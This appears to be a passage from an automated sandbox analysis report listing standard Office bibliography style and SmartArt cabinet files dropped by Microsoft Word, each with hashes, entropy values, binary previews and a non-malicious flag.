                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF.....1......L............................1...?...................0......"}..............ieee2006officeonline.xsl.:...............Content.inf.........[...G."...3$pE...G B....m3o[...I2&.f.,\..........}.n..{..e.8!^.3.A@...x..... .D.52gU..]..."..N8....s..CS..J3..HV...m...y..o....F.z......V.j._....=~k.....'.dY........1........#...d13.g.&C...C.xw.`f.hf..........]M....m.m....ud...,+.H~..cL...e#;(RI...eA....I.b...E...2..(...$.j...L...$..A....'[...H9..&..G.Q....".M.yl....]..?j%+....O~.*....|.se...K\.B"W..F.5.......=s...l.Y...K..yN.TBH[...sTWR.N.d...WEa....T.d.K.^sauI......m..s=.,qso5.b.V.s.]..9..,k4.\..L.;D...........;r.C...7.w.j..:N8.V6..a.3..j:A.mA..To..$.5....:./..p.x.3.=..__...8.EB.K.*..].-."..5-XU..J.....=o..K.Wavg.o].z.9.gk.._.........MZ.<.5............OY.n.o...r.9v.c.......[n.[..D...d..}.j.....LB,]_.9..St.@..C....\...^....-&.njq..!P....G^.....w.7.p~.......M..g.J............t1......q.w.rx...qp.....E.........-...2..G.........z.]B........d....C.@...@.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):32833
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.825460303519308
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                                                                                                                                                                                                                                                                                                                                                                          MD5:205AF51604EF96EF1E8E60212541F742
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....1A......L...........................1A...?..................S@......v...............iso690.xsl.................Content.inf.B.9.....[...A.c...32.E...P..'.^}.f...ikMJ....m..s..U.w{m{{...}n.4........I. ..9..d..I.......P|....F...F.......&&J.:I.34......+*M3..4mr.........m.r..m)....dK.wiw...H,...r........y.$..Cu...L...dH.../..V......g.PG$R39...4O..............{w..^....c.m.m.o.....#..Fgs..6.....b....3.I..O....B..B..1h"....K|f .41......_..g.N.<.>........(....o3a.M)....J..}....-......8.......g.hm!r<...-..1.1....q.?....S.m...`L.g#.K.igv.].ghD....L...p5..?.......iP.[JS.J..?z~.T/.Q...E.K.......P+\LW.-.c..[9.n.7.....P...*[.A1....m...4h.9...N[....h5 n%k.~RR.*c..n..=...4....).eH.-./..>....*.r..S.*..dE.........pF..s.A..?...f..u.+.{..?>N.4].}Xb.M......y......'.2..'..........J4{r..r.3........5>..a0.>.u_.y@g....+y.yu--,ZdD.........5]3..'.s...|.....K.....T..G.G.e...)..\x..OM.g...`..j0......BfH...+.....:......l`.qU...;.@...",.."........>;P.B.^F...3!......Rx.9..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):30957
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.808231503692675
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                                                                                                                                                                                                                                                                                                                                                                          MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                                                                                                                                                                                                                                                                                                                                                                          SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF.....9......L............................9...?...................8......1P..............iso690nmerical.xsl.................Content.inf...A@...[...5.....33.E...P.../..........5sv.]3srm8.T.=.......}.v.T.. ..4IH.r.%Z.(.q.\+K..[,....E....A......#CEF..}p..Y/s$...YKI.#M.?.t.1#C....I..v.vn...-...v7../S.m.Ma.....!.Y....4.......3.3....c&R9..%......(J..BDMI.>7J.....".....}.w.}w.wg.v...^.n.{....{f.mlI..%.#..I..S....D..QJ U......4........K.(@....DH.....}...8;..z...&0%e..G.OAM..x.3......\....zS9....}......89.B...e.W.p{;.....m.m3...}....../...q.~..;.,..".j.g..^N............iC.../|...g.=..9.Q].Gf.....QA....74..v.....9.n[......0.}..jo{y./.2..Ym......;u...b.(Jz^.....~..uM...{s../..#.)n2..S.S.c..6)U.V....!.'R.......P.S.D..S.p/......D.......{......?.u.",...Mp._....N..+..=Y#..&0w....r.......$.xwC......P.e7.>O....7....].y%q^S'....*.C.`.?..}Q..k../u.TK...y........S...{T.?......[.H.'L..AS.Y.|*..b...J.H-.^U>'9..uD[.".b[.l.......o..6.L).h.B0RJa.b..|m:.):......F
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):31562
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.81640835713744
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                                                                                                                                                                                                                                                                                                                                                                          MD5:1D6F8E73A0662A48D332090A4C8C898F
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....:<......L...........................:<...?..................D;.......V..............harvardanglia2008officeonline.xsl.L...............Content.inf.Vu......[...E..o..3D.5..nF.A..+.e.....6r..f........M3...-.s.m.... $r.b.!.q!.....G...0.\.......fd......%m...'1Y..f..O...*.#.P.,{..m...|..ww.{.m...f...n%...,..y...0y...8.Q...`.../.q....a...',.V......8.7..8t..................6.]..6..nw..ynm..-l.Y..,.I?..$....+b9$E!S@"..) .4........H...lA...@!a.F.l$..0#!.....n&.5j.t+..1f|.+....E.zDk.l8.+<q.^.........\5.l..iT.9...........Y..6.^,.o.bn.E*5w..s.../...W.gS..j9..'W.F......].4\Mzz..Td..Ho..~.Q...Z..D..O.JP..m..s.j.:..........y._.....#.*.rD....60.\!y........p.o3,..Ub,......[[L.{.5.....5.7UDB9.{;;g.z.z..jM.G.MY.oe.....(r..B6..CV.7Fl.Z/....-.O.vY.c...-..........b.T)3.u..f~x2.?.8.g.x.-.....Qt_...$e.l..jtP..b....h..*.sW0.`.....c...F_....t.........LC..*5I.X$^.;&....#.._\J..........;..wP..wX.qy.qs...}46..fK.XN.&0........k1....8...............'t.......}.......O_.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):33610
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8340762758330476
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                                                                                                                                                                                                                                                                                                                                                                          MD5:51804E255C573176039F4D5B55C12AB2
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....:D......L...........................:D...?..................XC.....................chicago.xsl. ...............Content.inf.!..B...[...H."m..3C.6...WP!i/Z..vn._...^omvw+...^..L.4o...g..y......^..x...BH.B.K....w.....F........p ./gg.h.0I',.$..a.`.*...^..vi..mw..........K....oQ............P...#...3.......U(.=...q.~?..H..?.'I4'.......X...}w.vw.....f.n..f{3.....-....%dK&q..D.H.Z..h-..H.[$ %.."..e....1...$.............'.....B..%..4...&`S!DQ...M.......N~............S..'....M..4E.^..dej..i..+.`...6F%sJ....Q..d.(*.s.Z...U-5Eh.s.CK...K..X$......j..T.?.`.|...=..R...-7...*...TU.....7a...&I.noOK|.W.R-+S.d..rR.....{h.Y...)..xJ..=.XM..o...P'.I4m..~I..C..m.....f.....;{Mzg+Wm.~...z...r-.....eK...lj:^.1g5...7.h(T"..t?5......u.....G.Z<..sL.\{...8=t...Z...'tps.:...|....6.....S..X...I...6l.M.....aq.;YS....{:.&.'.&.F.l...\.[L.%.so\.v.Lo...zO.^^...p..*9k...).CC..F0>L...VUE4.......2..c..p.rCi..#...b.C@o.l.. E_b..{d...hX.\_!a#.E.....yS.H...aZ...~D3.pj: ss?.]....~
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):31482
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.808057272318224
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                                                                                                                                                                                                                                                                                                                                                                          MD5:F10DF902980F1D5BEEA96B2C668408A7
                                                                                                                                                                                                                                                                                                                                                                          SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF.....;......L............................;...?...................;......................gosttitle.xsl.$...............Content.inf....v....[...=..Ic.32.E...`o.............m....4uk[.,.......{...}k{.R@(Hq..68nv...@.D.....$...j....8Q..........8.8........3...*.bi?Wt...:(..J.;&eii..io.w..z...`.'..i.MLR@.>....N..3`P.>$X@(r.#.D..(....P"_..I.$o.. L!y...I...H.........{.{....{.3....7..w..{w.2sn.dYn.lW...l...c$.UH....L6. .D$$...!F.!... .D............_..'.`.Q.v>..Z..f.n.l....0o.......bK...?s..eO....'.>t......S'..........~....h...v&7:q.x9|qs...%....:..D...ag.....e..'...".A.Y..?w"....p1t.9J.~.4.........~vj.n.8.;.O......../.}..io{p...e...\m.d`.gAm.......1"...N*...8..g"......~..[.e+.....\6i4.....%...Rq.U-p?..4P..4.f.?N.vI?.M\i.;.s..E.L.hu.*...\..5....N......]......\`...rS.\g.....2..!a).?.l.!i.^.t.u...x...g/.A..v.E...\.@.>kM...&.g.....%.......{.....2..E.g...'..[w...N.w..& 4M.a.cu.%:...\.D..Q..C.'fm..i....@._......QI.. ....h..|fB.il.(`..h.d;.l...`.s:
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):31605
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.820497014278096
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                                                                                                                                                                                                                                                                                                                                                                          MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....e<......L...........................e<...?...................;......................gostname.xsl."...............Content.inf.[.......[...>..|..32.E..o`h....W.>.^...v..5...m.w.$.U..U......m.mu...'4....m`.9F.. ...I..PTS..O.D...GM#...#CUE.`.`%n..N...G,.~..+.6cv.L...G.m.Y..vy.....Yh9/.m,..wtw..;....Ka.a.{.\...'.....<X....%)...G..d......R./..4$..32..@....f.h....w..ov.}w..[.....{.v.......dr..&w#G..$3.zI&f..(C..L.z5J... .`...!.!4. ...!.` .$........w.J.X7.w_..@.w..f]=.C.....I-....s.s_.x...~..A... ...z...nM..;....Z....vt....6...~.w.....*x.g.h.T.J..-.3=....G.n..ti.A...s...j$.Bf..?......6.t.<j...>.."....&=BO?w.uN.o.t.-r..K....>C..^G..p...k...>.xZ.[fL..n.."].W#...|.i.0W.q.F: ..<#w......w....s....."...n.qu.../rI.....q....P~.B..|b?.N.}..MyO..q..:q.7..-~.xa.S...|.....X.....g.W.3.mo..yy.GG.s>....qy....r........#.F.P..A.......A....b.2..14.8.i6..w.S...v~{0z.<.Z...^!.;2mSV.i....{...U...+...r.;...h.++..T6.a...$....j5F+..1t....b......|.Q\d-.S..2... ......Y..A...s....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):31471
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.818389271364328
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                                                                                                                                                                                                                                                                                                                                                                          MD5:91AADBEC4171CFA8292B618492F5EF34
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF.....;......L............................;...?...................;......g...............sist02.xsl.................Content.inf....!....[...=.rF..3U.5...g.i?..w.oY..If'.......Y.;.B.....Wo.{T.TA.~......8......u.p....@Q..k.?.....G....j.|*.*J69H.2.ee..23s..;3..i..L.,...0se.%J........%.....!.....qB...SC...GAu5.P..u7....:.|.$Fo............{.......v.v.g..{o....e.....m.JeRG..,.%.1..Lh.@8.i.....l.#.HB`B....C......D@....?....P?..................|.9..q.......9.n.....F...s,....3..Q..N......y......_i..9|.<w...'q.Tq...U.E.B...q.?.4..O(_O.A.......*jC.~.21.7.....u.C...]uc.....-.g.{C~9q.q.1.1...4..=.0.Z.^....'../....-.6.K.....K...A#.GR..t.@.{.O.......Q5..=....X...^...F3.e.E.Z..b+R..?Z..0T1.....gQz.&....%y=zx.f.....6-*...u.Rm..x<...?...!g@.}..).J...:*...9.s&.v..}..'...\..Sd..F...........kQr.....h..3..1....B...B{M...%O.59.\.#....s/.pE.:}...k_.P.>.zj....5|.9+....$M..L........(...@#.....N.....N.*..........E..7..R$.:9!r>7.....v...>..S.w....9..]..n.w.;&.W..<r\S....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):20457
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.612540359660869
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                                                                                                                                                                                                                                                                                                                                                          MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                                                                                                                                                                                                                                                                                                                                                          SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF............D................................?..................................chevronaccent.glox.................Content.inf..O.$N...[.........B.....?.....$Zy..Zkr...y<.....Di-.aVX/....h..-.~........#.../.Fz....T...p....A..eHMe[..p...=................f..../%o......F@..=..$.B!....}.0..g..^vlI......f.W.F...Nm..2`...)...,.HL4.nsl.F.ir.k..e.!^.j2.v.iT....t...*..!h..Y...2Q..-.x.,.Xj.U.cj,....9.....)..W..n3f.......(cH.D.4M.!.+..4..3r..y......|r..@.PD.R..#...F..nJAR..1{-.....u3..$..L.b+h....:lZ.>....q.?. ~l..^.%.m....a...cG.h.?.|.?7.'....b.G.4..'..A...o.Z...//..?...d..*.....C..Z.....]Yv.g.]..... .........]x.#=.../.7;R.j....G.....zq=O`[.'5g.D.u..)..../../.v.JmCW.da....3.f..C.z%...S=....;A.q.|....z.E.aRu........ k..J"+.f.S.@.........eD4....\0..t./U..%.H..........M:..U.......J...Z..H.DG..u^..D..P....`.^b.........`c......#.....c.?...#..C.V.&.'..f.'...f.[..F.O..a...&..{TiXg4; .X."..0...B.#..^..........N"..w.@f...gd.S..K.....E....ZR...;.twR>.z.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):26944
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.7574645319832225
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                                                                                                                                                                                                                                                                                                                                                          MD5:F913DD84915753042D856CEC4E5DABA5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF....0*......D...........................0*...?..................t,..............ConvergingText.glox.....t,..........Content.inf..C..)t-[.....@.........=...xxA. ...E^....x.x.^.......x..^^...DF.......s..d.P.....5.;..]...2.t.w.....O9.G..;.'.T....@I.,.q.u.3..P...9... ....`J.......g.(....).,.h0.....$.3..;.._.....~.de.jj.....U..K.0....`.@.H.1.x.Z.@..q....?....x.wW.....+am8A".....I..)..]...s..-z.2S+|.Cb.t6f],.n.LV......OVg....O.at|..-..x.....:....]s...u..g}.P..v.3....^.".%..%...#.2.....l00...n.......r8.p.....^.....n.)..,..t.^$b...b.q.W...F..R...n.-.+..'........Aw=._OwH....8.:s..{.#..{N.hW..`.._........Wy....>U.?....-.8tg...=..y..@.,.v|......l...t..l#{...H....9..|......~...De..#@y.&K....U...q.c.zK..D.<pV.....Ql..&Y...=#...w....r.`#2....Ug.J(..T...KmW.@...!....j:......M......!..E.7#s.t..F.aU..N....-.i......|w.lr..G.n.,.......=Kl.-m.?F.....v]?.......{q.U.t...<.|..u.....3R.`.t.T.>;v.....KQ...S...7..1...N.kN.y.)v.....3H:..D.{.+.(......u..^W&.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):20235
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.61176626859621
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                                                                                                                                                                                                                                                                                                                                                          MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                                                                                                                                                                                                                                                                                                                                                          SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:MSCF............D................................?..................................BracketList.glox.................Content.inf....7r...[.... G.q..@...B.....?X!.A.......!........X..Vk.JK...Z..=......PD.....P....5...jp..+..T....b.)np5.7.....Zz........... ..!.....S......1....`....h......T?.Nq../......z....[..:..5f;....O...d.FxD...4...Z....[..a...w..W.[..P...5.]...6..."...+t].!...2\%%`Q.\..)...=>.)......a.$.2.,...2,.Lw.?..+..qf....h....T/B.....}T.E...'.%.....,.......X....b..gt.hPYc|.....a...j...=...{..a.`!8!..|...L.T..k..!,.R.z/W....{..,...+..w.m..sQ..7<x..B....?....\.)..l...d...}.....v..W.C..'=p1c.Z=.W.g.e....&wm..N,..K.T../.oV../=9.}.....".28...r.Q....dzj{....S...1m...x9_...2PXpa...Q.n.$z...c..SGq...k......}kPE..*...3.|.5A.>..6.......+)qCB....q....qNkGe...W]..o..Z...J.<.i......qq.8....q..BE.(...._h.U.\@3.F...KdO..=1j+....).*Q.|B..Z..%......LDYk....j.....{klDW..#CVy}...X..O!..}..s..&..DC.....tL.j..b.......[...n.'..1..Xc...9Q..gM.....n..3...v.....~.).
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):31083
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.814202819173796
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                                                                                                                                                                                                                                                                                                                                                          MD5:89A9818E6658D73A73B642522FF8701F
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
